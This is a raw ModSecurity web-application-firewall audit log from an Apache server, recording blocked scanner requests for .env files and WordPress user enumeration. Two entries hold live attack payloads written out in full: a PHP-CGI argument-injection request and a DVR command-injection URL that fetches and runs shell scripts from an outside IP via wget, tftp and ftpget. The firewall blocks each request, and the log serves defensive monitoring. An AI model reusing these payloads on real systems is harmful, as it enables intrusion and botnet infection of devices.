Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749777289637211 866 (- - -) Stopwatch2: 1749777289637211 866; combined=410, p1=372, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d4b5238-Z-- --a16ee54c-A-- [13/Jun/2025:08:15:33 +0700] aEt7tR1N9VxFJpQ5cVhx0AAAAIA 103.236.140.4 38306 103.236.140.4 8181 --a16ee54c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --a16ee54c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a16ee54c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749777333715905 827 (- - -) Stopwatch2: 1749777333715905 827; combined=314, p1=278, p2=0, p3=0, p4=0, p5=35, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a16ee54c-Z-- --8c4bcf45-A-- [13/Jun/2025:08:15:35 +0700] aEt7t_8ql0QLmijbYWa7BwAAAEI 103.236.140.4 38346 103.236.140.4 8181 --8c4bcf45-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --8c4bcf45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c4bcf45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749777335850912 819 (- - -) Stopwatch2: 1749777335850912 819; combined=369, p1=334, p2=0, p3=0, p4=0, p5=35, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c4bcf45-Z-- --892b4b14-A-- [13/Jun/2025:08:41:50 +0700] aEuB3smhAKaFi0V9-RPcAgAAAME 103.236.140.4 38852 103.236.140.4 8181 --892b4b14-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 64.227.32.66 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --892b4b14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --892b4b14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749778910559725 790 (- - -) Stopwatch2: 1749778910559725 790; combined=321, p1=271, p2=0, p3=0, p4=0, p5=50, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --892b4b14-Z-- --97acef66-A-- [13/Jun/2025:09:20:47 +0700] aEuK__8ql0QLmijbYWbHEAAAAFc 103.236.140.4 55762 103.236.140.4 8181 --97acef66-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 68.183.180.73 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 68.183.180.73 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --97acef66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97acef66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749781247464142 874 (- - -) Stopwatch2: 1749781247464142 874; combined=419, p1=380, p2=0, p3=0, p4=0, p5=39, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97acef66-Z-- --97e97b44-A-- [13/Jun/2025:09:29:49 +0700] aEuNHe9dCOerv4VGhqRbWAAAAAw 103.236.140.4 37570 103.236.140.4 8181 --97e97b44-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.101.236.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.101.236.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --97e97b44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97e97b44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749781789672346 3205 (- - -) Stopwatch2: 1749781789672346 3205; combined=1469, p1=458, p2=918, p3=0, p4=0, p5=93, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97e97b44-Z-- --e7bd8757-A-- [13/Jun/2025:10:47:23 +0700] aEufSx1N9VxFJpQ5cVirEAAAAIM 103.236.140.4 49680 103.236.140.4 8181 --e7bd8757-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 122.146.91.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 122.146.91.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e7bd8757-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7bd8757-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749786443720544 2775 (- - -) Stopwatch2: 1749786443720544 2775; combined=1452, p1=450, p2=964, p3=0, p4=0, p5=37, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7bd8757-Z-- --c0916e66-A-- [13/Jun/2025:11:22:34 +0700] aEunismhAKaFi0V9-RMQSwAAAME 103.236.140.4 40290 103.236.140.4 8181 --c0916e66-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.100.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.100.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c0916e66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0916e66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749788554194968 864 (- - -) Stopwatch2: 1749788554194968 864; combined=408, p1=369, p2=0, p3=0, p4=0, p5=38, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0916e66-Z-- --39edb159-A-- [13/Jun/2025:12:33:48 +0700] aEu4PB1N9VxFJpQ5cVjUfwAAAJQ 103.236.140.4 59988 103.236.140.4 8181 --39edb159-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --39edb159-C-- --39edb159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39edb159-E-- --39edb159-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749792828164338 3118 (- - -) Stopwatch2: 1749792828164338 3118; combined=1815, p1=376, p2=1404, p3=0, p4=0, p5=35, sr=59, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39edb159-Z-- --3ab4371d-A-- [13/Jun/2025:12:42:12 +0700] aEu6NB1N9VxFJpQ5cVjY7wAAAI4 103.236.140.4 44666 103.236.140.4 8181 --3ab4371d-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Facebot Accept-Charset: utf-8 --3ab4371d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ab4371d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749793332286280 847 (- - -) Stopwatch2: 1749793332286280 847; combined=382, p1=344, p2=0, p3=0, p4=0, p5=38, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ab4371d-Z-- --1da11633-A-- [13/Jun/2025:13:21:19 +0700] aEvDXx1N9VxFJpQ5cVjnZAAAAIA 103.236.140.4 44376 103.236.140.4 8181 --1da11633-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 18.117.197.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 18.117.197.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1da11633-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1da11633-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749795679614154 3391 (- - -) Stopwatch2: 1749795679614154 3391; combined=1493, p1=482, p2=975, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1da11633-Z-- --d640a111-A-- [13/Jun/2025:13:46:41 +0700] aEvJUR1N9VxFJpQ5cVj3mwAAAIw 103.236.140.4 60654 103.236.140.4 8181 --d640a111-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.225.75.246 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d640a111-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d640a111-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749797201459383 687 (- - -) Stopwatch2: 1749797201459383 687; combined=255, p1=225, p2=0, p3=0, p4=0, p5=30, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d640a111-Z-- --afdf062c-A-- [13/Jun/2025:14:55:22 +0700] aEvZav8ql0QLmijbYWY24wAAAEQ 103.236.140.4 46976 103.236.140.4 8181 --afdf062c-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 44.245.201.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 44.245.201.240 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --afdf062c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afdf062c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749801322673788 732 (- - -) Stopwatch2: 1749801322673788 732; combined=286, p1=239, p2=0, p3=0, p4=0, p5=47, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afdf062c-Z-- --0677bb7c-A-- [13/Jun/2025:15:18:21 +0700] aEvezcmhAKaFi0V9-RN2lQAAANQ 103.236.140.4 32966 103.236.140.4 8181 --0677bb7c-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 104.167.221.114 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.167.221.114 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --0677bb7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0677bb7c-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749802701752858 1058 (- - -) Stopwatch2: 1749802701752858 1058; combined=473, p1=432, p2=0, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0677bb7c-Z-- --cf42de49-A-- [13/Jun/2025:16:23:22 +0700] aEvuCsmhAKaFi0V9-ROZIQAAAMo 103.236.140.4 36956 103.236.140.4 8181 --cf42de49-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --cf42de49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf42de49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602059917 1340 (- - -) Stopwatch2: 1749806602059917 1340; combined=392, p1=350, p2=0, p3=0, p4=0, p5=42, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf42de49-Z-- --02da1b61-A-- [13/Jun/2025:16:23:22 +0700] aEvuCh1N9VxFJpQ5cVhvQwAAAJE 103.236.140.4 36966 103.236.140.4 8181 --02da1b61-B-- GET /.env.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --02da1b61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02da1b61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602240843 977 (- - -) Stopwatch2: 1749806602240843 977; combined=396, p1=347, p2=0, p3=0, p4=0, p5=48, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02da1b61-Z-- --aa996c26-A-- [13/Jun/2025:16:23:22 +0700] aEvuCh1N9VxFJpQ5cVhvRAAAAJQ 103.236.140.4 36972 103.236.140.4 8181 --aa996c26-B-- GET /.env.example HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --aa996c26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa996c26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602421498 854 (- - -) Stopwatch2: 1749806602421498 854; combined=353, p1=314, p2=0, p3=0, p4=0, p5=39, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa996c26-Z-- --9c535469-A-- [13/Jun/2025:16:23:22 +0700] aEvuCv8ql0QLmijbYWZl9AAAAE8 103.236.140.4 36982 103.236.140.4 8181 --9c535469-B-- GET /.env.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9c535469-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c535469-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602601937 830 (- - -) Stopwatch2: 1749806602601937 830; combined=306, p1=270, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c535469-Z-- --57f36f08-A-- [13/Jun/2025:16:23:22 +0700] aEvuCv8ql0QLmijbYWZl9QAAAFU 103.236.140.4 36988 103.236.140.4 8181 --57f36f08-B-- GET /.env.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.210 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --57f36f08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57f36f08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749806602782317 711 (- - -) Stopwatch2: 1749806602782317 711; combined=265, p1=231, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: 